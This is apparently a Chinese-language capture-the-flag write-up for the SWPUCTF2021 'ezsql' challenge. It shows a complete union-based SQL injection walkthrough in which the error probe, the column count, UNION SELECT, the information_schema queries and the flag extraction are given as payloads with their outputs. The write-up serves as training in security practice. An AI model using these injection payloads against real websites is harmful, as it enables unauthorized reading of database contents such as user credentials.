SWPUCTF2021-ezsql-wp

题目链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
> ?wllm=1'	# 尝试看看是否为sql查询
< You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
# 说明确实为MariaDB sql查询且存在注入漏洞

> ?wllm=1' order by 3--+
< Your Login name:xxx
  Your Password:yyy		# 正常
> ?wllm=1' order by 4--+
< Unknown column '4' in 'order clause'	# 异常
# 说明读取列数为3,接着联合查询

> ?wllm=1' union select 1,2,3--+
< Your Login name:xxx
  Your Password:yyy		# 正常
> ?wllm=1' union select 1,2,3 limit 1,1--+	# 取第一行
< Your Login name:2
  Your Password:3	# 说明Loginname为第二字段 password为第三字段

# 获取database名
> ?wllm=1' union select 1,2,database() limit 1,1--+
< Your Login name:2
  Your Password:test_db

# 获取tables
> ?wllm=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' limit 1,1--+
< Your Login name:2
  Your Password:test_tb,users

# 获取columns
> ?wllm=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' limit 1,1--+
< Your Login name:2
  Your Password:id,flag

# 获取flag
> ?wllm=1' union select 1,2,flag from test_db.test_tb limit 1,1--+
< Your Login name:2
  Your Password:NSSCTF{85fe17d6-6beb-479d-a957-c69fb83d8217}
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP